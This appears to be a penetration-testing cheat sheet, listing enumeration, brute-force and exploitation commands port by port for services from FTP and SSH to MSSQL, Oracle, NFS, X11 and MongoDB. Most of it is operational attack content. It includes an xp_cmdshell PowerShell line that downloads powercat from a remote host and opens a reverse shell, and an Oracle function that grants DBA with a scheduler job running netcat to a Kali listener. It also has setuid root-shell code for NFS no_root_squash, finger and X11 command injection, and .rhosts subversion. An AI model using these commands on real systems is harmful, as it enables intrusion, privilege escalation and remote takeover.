Services
7 - Echo
nc -uvn <IP> 7
Hello echo #This is what you send
Hello echo #This is the response21 - FTP
Fingerprint
telnet <IP> 21use auxiliary/scanner/ftp/ftp_versionAnonymous access
ftp <IP>
> anonymous
> anonymous
> ls -ab
> binary
> ascii
> byenmap -sV --script ftp-anon -p <IP>Brute Force
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV <IP> ftpnmap -sV --script ftp-brute -p <IP>use auxiliary/scanner/ftp/ftp_loginFTP Bounce Port Scanner
nmap -sV --script ftp-bounce -p <IP>use auxiliary/scanner/portscan/ftpbounceConfiguration files
ftpusers
ftp.conf
proftpd.conf
22 - SSH
Fingerprint/Enumerate
telnet <IP> 22 (banner grab)use auxiliary/scanner/ssh/ssh_versionnmap --script ssh2-enum-algos -p 22 -n <IP>
nmap --script ssh-hostkey -p 22 -n <IP> --script-args ssh_hostkey=full
nmap --script sshv1 -p 22 -n <IP>Brute Force
hydra -l root -p admin <IP> -t 4 sshuse auxiliary/scanner/ssh/ssh_loginConfiguration files
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts
23 - Telnet
Fingerprint
telnet <IP>nmap -p 23 <ip> --script telnet-encryptionuse auxiliary/scanner/telnet/telnet_versionBrute Force
hydra -L usernames.txt -P passwords.txt <IP> telnet -Vnmap -p 23 --script telnet-brute --script-args userdb=<myusers.lst>,passdb=<mypwds.lst>,telnet-brute.timeout=8s <IP>use auxiliary/scanner/telnet/telnet_login# Solaris 10+
telnet -l "-froot" hostnameConfiguration files
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
25, 587 - SMTP
Fingerprint / SASL Methods
telnet <IP> 25
> ehlo meopenssl s_client -connect <IP>:25 -starttls smtp
> ehlo menmap --script smtp-commands.nse [--script-args smtp-commands.domain=<domain>] -pT:25,465,587 <IP>use auxiliary/scanner/smtp/smtp_versionEnumerate users
VRFY username
EXPN usernamenmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587 <IP>use auxiliary/scanner/smtp/smtp_enumBrute Force
nmap -p 25 --script smtp-brute <IP>Open Mail Relay
HELO me
MAIL FROM: test@testdomain.com
RCPT TO: my_email@example.com
DATA
Subject: This is a test mail
From: Test User
To: Test Target
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
This is a test email for you to read.
.
QUITnmap -v --script=smtp-open-relay -p 25 <IP>use auxiliary/scanner/smtp/smtp_relay53 - DNS
DNS Enumeration
use auxiliary/gather/dns_srv_enum
use auxiliary/gather/enum_dnsnmap --script=dns-service-discovery -p 5353 <IP>
nmap --script=broadcast-dns-service-discovery <IP>
nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'
nmap -sSU -p 53 --script dns-nsid <IP>
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='example.com'"Zones/Zone Transfer
nmap -sn -Pn ns1.example.com --script dns-check-zone --script-args='dns-check-zone.domain=example.com'
nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain>Recursion
nmap -sU -p 53 --script=dns-recursion <IP>DNS Lookup
host <Domain>nslookup <Domain> [server]
nslookup -type=ns <Domain>dig [-4 | -6 ] @<Server> <Domain> <Type>fierce -dns <domain>python
>>> import socket
>>> socket.gethostbyname('www.google.com')use auxiliary/gather/dns_infoReverse DNS Lookup
dig [-4 | -6 ] -x <IP>nslookup -type=ns <IP>dnsrecon -r <startIP-endIP>whois <IP> | grep -E "Creation|Created|Registration|created|Expiration|Expires|Email"use auxiliary/gather/dns_reverse_lookupBrute Force
nmap --script dns-brute www.example.com -sn -n -Pnuse auxiliary/gather/dns_bruteforceDNS Amplification Scanner
auxiliary/scanner/dns/dns_ampDNS Non-Recursive Record Scraper
nmap -sU -p 53 --script dns-cache-snoop.nse <IP>use auxiliary/gather/dns_cache_scraperConfiguration Files
host.conf
resolv.conf
named.conf
69 - TFTP
Enumeration
tftp <IP> PUT local_file
tftp <IP> GET conf.txt (or other files)
# Solarwinds TFTP server
tftp – i <IP> GET /etc/passwd (old Solaris)Bruteforcing
use auxiliary/scanner/tftp/tftpbrute79 - Finger
User enumeration
finger root example.com
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.comnmap -sV -sC <target>use auxiliary/scanner/finger/finger_usersCommand execution
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"Finger Bounce
finger user@host@victim
finger @internal@externalFunny Bit
Weather forecast
finger london@graph.no80, 8080, 443 - Web Ports
Too much to be listed here: These are not the droids you are looking for.
88 - Kerberos
Enumerate Users
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='test'" <IP>110 - POP3
Enumeration
nmap -sV -sC <IP>use auxiliary/scanner/pop3/pop3_versionBrute Force
nmap -sV --script=pop3-brute <IP>use auxiliary/scanner/pop3/pop3_loginRetrieve email
telnet <IP> 110
> USER admin@<IP>
> PASS admin
# List all emails
> list
# Retrive email number 5, for example
> retr 5111 - Portmapper
Enumerate RPC-based services
rpcinfo <IP>
rpcinfo -p <IP>nmap -sSUC -p111 <IP>RPCBind + NFS
Check for the nfs mounts using port 111
rpcbind -p <IP>use auxiliary/scanner/nfs/nfsmount113 - Ident
Enumeration
nmap -sV -sC <IP>119 - NNTP Network News Transfer Protocol
Enumeration
nmap -p 119,433,563 --script nntp-ntlm-info <IP>Brute Force
use auxiliary/scanner/nntp/nntp_login123 - NTP
Enumeration
nmap -sU -p 123 --script ntp-info <IP>
nmap -sU -p 123 --script ntp-monlist.nse <IP>ntpq <IP>
> lpeers
> version
> readlist
> host
> hostname
> ntpversionntpdc -c monlist <IP>
ntpdc -c sysinfo <IP>Mode 6 Query
ntpq -c rv <IP>Configuration files
ntp.conf
135-139, 445 - NetBIOS
Enumeration
net view \\<IP>use auxiliary/scanner/smb/smb_versionnbtscan -r 192.168.1.1/24enum4linux -a <IP>nmap --script=broadcast-netbios-master-browser <IP>nmap --script=msrpc-enum <IP>use exploit/windows/dcerpc/ms03_026_dcomDomain
nmblookup -A <DC_IP>SMB/Samba shares
smbclient -L 10.10.10.10
smbclient //10.10.10.10/tmp
smbclient \\\\10.10.10.10\\ipc$ -U bob
smbclient //10.10.10.10/ipc$ -U bobNull Session
net use \\<IP>\ipc$ "" /u:""smbclient //TYPHOON/typhoon -I <IP> -NConnectin with PSExec
use exploit/windows/smb/psexecConfiguration Files
Smb.conf
lmhosts
135, 593 - Microsoft Windows RPC Services and Microsoft RPC Services over HTTP
Enumeration
Endpoint Mapper Service Discovery
use auxiliary/scanner/dcerpc/endpoint_mapper
Hidden DCERPC Service Discovery
use auxiliary/scanner/dcerpc/hidden
Remote Management Interface Discovery
use auxiliary/scanner/dcerpc/management
DCERPC TCP Service Auditor
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditorrpcdump.py <IP>161 - SNMP
Enumeration
nmap -Pn -sU -p 161 --script=snmp-brute <IP>
nmap -Pn -sU -p 161 --script=snmp-interfaces <IP>Available nse scripts:
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nsesnmpwalk -v <Version> -c <Community string> <IP>Default Community Strings
public
private
communityuse auxiliary/scanner/snmp/snmp_enumBruteforce
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <IP>for i in $(cat /usr/share/doc/onesixtyone/dict.txt); do echo -n "$i :"; snmpget -v 3 -u $i udp6:[<IPv6>] 1.3.6.1.2.1.1.4.0; doneuse auxiliary/scanner/snmp/snmp_loginConfiguration files
snmp.conf
snmpd.conf
snmp-config.xml
264 - Check Point FireWall-1 Topology
Enumeration
use auxiliary/gather/checkpoint_hostname389, 636 - LDAP
Enumeration
nmap -p 389 --script ldap-rootdse <IP>ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
ldapsearch -h <IP> -p 389 -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -h <IP> -p 389 -x -b "dc=example,dc=com"nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' <IP>Brute force
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <ip>Configuration Files
General
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 server
V3.sas.oc
Microsoft Active Directory server
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
500/1723 - PPTP/L2TP/VPN
Aggressive mode
ike-scan <IP> -M -A --id=123Testing process would go as follows:
Scan for the IKE service
Enumerate transform sets and confirm Aggressive Mode support
Run IKEForce in enum mode to obtain a valid group name or ID
Obtain a valid hash using IKE-Scan
Crack the hash using OCLHashcat
Run IKEForce in brute mode to obtain valid XAUTH credentials
Authenticate using chosen client
Pwn to your heart's content
enumerate id
Test 1
ike-scanpython ikeforce.py <IP> -apython ikeforce.py <IP> -e -t x x x x -w ./wordlistsTest 2
ike-scan -M <IP>ike-scan -M <IP> -Aike-scan -M <IP> -A --auth=65001for i in $(cat /root/groups.txt); do echo |tee -a /root/vpn-test; echo "Testing: $i" |tee -a /root/vpn-test && ike-scan -M <IP> -A --auth=65001 --id=$i | tee -a /root/vpn_test; donegrep "Handshake returned" -B2 /root/vpn_testike-scan -M <IP> -A --auth=65001 --id=ID -P/tmp/pskpsk-crack -d /usr/share/wordlists/metasploit/unix_passwords.txt /tmp/psk502 - Modbus
Discover
nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 <IP>512 - rexec
Access
rlogin <ipaddress>Brute Force
nmap -p 512 --script rexec-brute <IP>use auxiliary/scanner/rservices/rexec_login513 - rlogin
Enumeration
Find the files
find / -name .rhosts
locate .rhosts
Examine Files
cat .rhosts
Subvert the files
echo ++ > .rhostsManual Login
rlogin -l username <IP>
rlogin <IP>Brute force
nmap -p 513 --script rlogin-brute <ip>hydra -L usernames.txt -P passwords.txt <IP> rlogin -Vuse auxiliary/scanner/rservices/rlogin_login514 - rsh
Enumeration
rsh <IP> <Command>Brute force
hydra -L usernames.txt rsh://<IP> -v -Vuse auxiliary/scanner/rservices/rsh_login548 - AFP - Apple Filing Protocol
Enumeration
nmap -sV -sC <IP>
nmap -sS -sV -p 548 --script=afp-ls <IP>
nmap -sV --script=afp-showmount <IP>
nmap -sV --script=afp-path-vuln <IP>use auxiliary/scanner/afp/afp_server_infoBrute force
nmap -p 548 --script afp-brute <IP>554, 8554 - RTSP
Enumeration
nmap -p 8554 -sV --script rtsp-methods <IP>
nmap -p 554 --script rtsp-methods <ip>Brute Force
nmap -p 554 --script rtsp-url-brute <ip>873 - Rsync
Enumeration
nmap -p 873 --script=rsync-list-modules <IP>use auxiliary/scanner/rsync/modules_list1099 - Java RMI
Enumeration
use auxiliary/scanner/misc/java_rmi_serverNotable Exploits
Java RMI Server Insecure Default Configuration Java Code Execution
use exploit/multi/misc/java_rmi_serverDefault configuration of rmiregistry allows loading classes from remote URLs
nmap --script=rmi-vuln-classloader -p 1099 <IP>1433, 1434 - SQL Server
Metasploit
Queries the MSSQL instance for information
use auxiliary/scanner/mssql/mssql_pingDefault passwords
use auxiliary/scanner/mssql/mssql_loginMicrosoft SQL Server Configuration Enumerator
use auxiliary/admin/mssql/mssql_enumMicrosoft SQL Server xp_cmdshell Command Execution
use auxiliary/admin/mssql/mssql_execEXEC xp_cmdshell 'powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.1:8080/powercat.ps1");powercat -c 10.0.0.1 -p 443 -e cmd'Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
use auxiliary/admin/mssql/mssql_enum_domain_accountsMicrosoft SQL Server Find and Sample Data
use auxiliary/admin/mssql/mssql_findandsampledataMicrosoft SQL Server Generic Query
use auxiliary/admin/mssql/mssql_sqlMSSQL Schema Dump
use auxiliary/scanner/mssql/mssql_schemadumpOthers
use auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
use auxiliary/admin/mssql/mssql_enum_sql_logins
use auxiliary/admin/mssql/mssql_escalate_dbowner
use auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
use auxiliary/admin/mssql/mssql_escalate_execute_as
use auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
use auxiliary/admin/mssql/mssql_idf
use auxiliary/admin/mssql/mssql_ntlm_stealer
use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
use auxiliary/admin/mssql/mssql_sql_file
use auxiliary/analyze/jtr_mssql_fast
use auxiliary/scanner/mssql/mssql_hashdumpHacking SQL Server Stored Procedures
1494 - Citrix
Enumeration
1521 - Oracle
Oracle Enumeration
use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/sid_enumBrute Force
nmap
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 <IP>
nmap --script=oracle-sid-brute -p 1521-1560 <IP>
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <IP>
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL <IP>
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <IP>odat
./odat-libc2.5-x86_64 sidguesser -s <IP>>./odat-libc2.5-x86_64 passwordguesser -d XE -s <IP>metasploit
use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/oracle/sid_brutePrivEsc
select * from session_privs;select banner from v$version where banner like 'Oracle%';Create function:
CREATE OR REPLACE FUNCTION GETDBA_mine(FOO varchar) return varchar deterministic authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to myuser identified by myuser';
commit;
return 'FOO';
End;Create index:
create index exploit_index_mine on SYS.DUAL(SCOTT.GETDBA_mine('BAR'));select user from sys.dual;LOGIN WITH NEW USER - VIA RAZORSQL
select * from session_privs;Start listener on Kali:
nc -lnvp 9999Create job:
begin
dbms_scheduler.create_job( job_name => 'TEST',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('TESTX', 1, 'KALI_IP');
dbms_scheduler.set_job_argument_value('TESTX', 2, '9999');
dbms_scheduler.set_job_argument_value('TESTX', 3, '-e');
dbms_scheduler.set_job_argument_value('TESTX', 4, '/bin/bash');
dbms_scheduler.enable('TESTX');
end;SQL Injection References
2049 - NFS
Enumeration
showmount -e <hostname/IP>mount -t nfs <IP>:/directory_found_exported /local_directoryno_root_squash
Case 1:
int main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,”sh”,0); }chown root.root ./pwnme
chmod u+s ./pwnmeCase 2:
cp /bin/bash local_shellcat local_shell > spawn_root_shell
chmod 4777 !$./spawn_root_shell -pConfiguration Files
/etc/exports
/etc/lib/nfs/xtab
2301, 2381 - Compaq/HP Insight Manager
Enumeration
nmap -sV -p 2301,2381 <IP>Configuration Files
path.properties
mx.log
CLIClientConfig.cfg
database.props
pg_hba.conf
jboss-service.xml
.namazurc
3260 - ISCSI
Enumeration
nmap -sV -p 3260 --script=iscsi-info <IP>Exploitation
3306 - MySQL
Enumeration
nmap -A -n -p3306 <IP>
nmap -A -n -PN --script:ALL -p3306 <IP>telnet <IP> 3306use test; select * from test;use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_hashdumpmysql -u root -p -h <IP>Quick testing
mysql -h <IP> -u root
mysql -h <IP> -u root
mysql -h <IP> -u root@localhost
mysql -h <IP>
mysql -h <IP> -u ""@localhostBrute Force
use auxiliary/scanner/mysql/mysql_loginPrivilege Escalation
Current Level of access
mysql> select user();
mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
Access passwords
mysql> use mysql
mysql> select user,password from user;
Create a new user and grant him privileges
mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Break into a shell
mysql> \! cat /etc/passwd
mysql> \! bashConfiguration Files
windows
config.ini
my.ini
windows\my.ini
winnt\my.ini
/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
3389 - RDesktop
Network level auth NLA
nmap -p 3389 --script rdp-enum-encryption <IP>Brute Force
ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.1015000+ - Sybase
Enumeration
5060 - SIP
Enumeration
nc <IP> 5060Configuration Files
SIPDefault.cnf
asterisk.conf
sip.conf
phone.conf
sip_notify.conf
.cfg
000000000000.cfg
phone1.cfg
sip.cfg etc. etc.
5432 - Postgresql
Enumeration
use auxiliary/scanner/postgres/postgres_versionBrute Force
use auxiliary/scanner/postgres/postgres_loginExploitation
PostgreSQL 9.0, 9.1, and 9.2
use auxiliary/scanner/postgres/postgres_dbname_flag_injection5555 - HPDataProtector
RCE
use exploit/multi/misc/hp_data_protector_exec_integutil5900^ - VNC
Enumeration
use auxiliary/scanner/vnc/vnc_none_authScan 5900^ for direct access.5800 for HTTP access.Brute Force
use auxiliary/scanner/vnc/vnc_loginPassword Attacks
Registry Locations
\HKEY_CURRENT_USER\Software\ORL\WinVNC3
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
Decryption Key
0x238210763578887Default location where the VNC password is stored
~/.vnc/passwdConfiguration Files
.vnc
/etc/vnc/config
$HOME/.vnc/config
/etc/sysconfig/vncservers
/etc/vnc.conf
5984 - CouchDB
Enumeration
curl http://<IP>:5984/
curl -X GET http://<IP>:5984/_all_dbs
curl -X GET http://user:password@<IP>:5984/_all_dbs
curl -X GET http://<IP>:5984/{dbname}/_all_docs
curl -X GET http://<IP>:5984/{dbname}/{id}6000^ - X11
Enumeration
nmap -p 6000 --script=x11-access <IP>> -nvvvuse auxiliary/scanner/x11/open_x11Screenshots
xwd -display <IP>:0 -root -out screenshot.xwdIf image is black, kill screensaver:
xwininfo -root -children -display <IP>>:0xkill -display 192.168.X.209:0 -id 0x3200001 # 0x3200001 = "gnome-screensaver"Keyboard Command Injection
Manual
export DISPLAY=<IP>:0xdotool type "id"xdotool key KP_Enterxdotool type "clear && history () bash && history"xdotool key KP_EnterMetasploit
use exploit/unix/x11/x11_keyboard_execSniff the keyboard keystrokes
xspy <IP>Configuration Files
/etc/Xn.hosts
/usr/lib/X11/xdm
Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
/usr/lib/X11/xdm/xsession
/usr/lib/X11/xdm/xsession-remote
/usr/lib/X11/xdm/xsession.0
/usr/lib/X11/xdm/xdm-config
DisplayManager*authorize:on
6379 - Redis
Enumeration
nmap -p 6379 --script redis-info <IP>use auxiliary/scanner/redis/redis_server
use auxiliary/scanner/redis/redis_login
use auxiliary/scanner/redis/file_uploadExploitation
9001, 9030 - Tor
Enumeration
nmap --script=tor-consensus-checker <IP>9100 - PJL - Jet Direct
Enumeration
nmap -p 9100 --script=pjl-ready-message.nse -n <IP>use auxiliary/scanner/printer/printer_version_info9160 - Apache Cassandra
Enumeration
nmap -p 9160 -n --script=cassandra-info <IP>Brute Force
nmap -p 9160 -n --script=cassandra-brute <IP>10000 - NDMP -Network Data Management Protocol
Enumeration
nmap -sV <IP>
nmap -p 10000 --script ndmp-fs-info -n <IP>11211 - Memcache
Enumeration
nmap -p 11211 --script memcached-info <IP>telnet <IP> 1121127017, 27018 - MongoDB
Enumeration
nmap -p 27017 -sV --script mongodb-info <IP>
nmap -p 27017 -sV --script mongodb-databases.nse <IP>Brute Force
nmap 10.169.xx.xx -p 27017 -sV --script mongodb-brute -nuse auxiliary/scanner/mongodb/mongodb_login44818 - EthernetIP-TCP-UDP
Enumeration
nmap -p 44818 -n --script enip-enumerate -Pn <IP>47808 - UDP BACNet
Enumeration
nmap -sU -p 47808 -n -vvv --script BACnet-discover-enumerate --script-args full=yes <IP>Last updated
Was this helpful?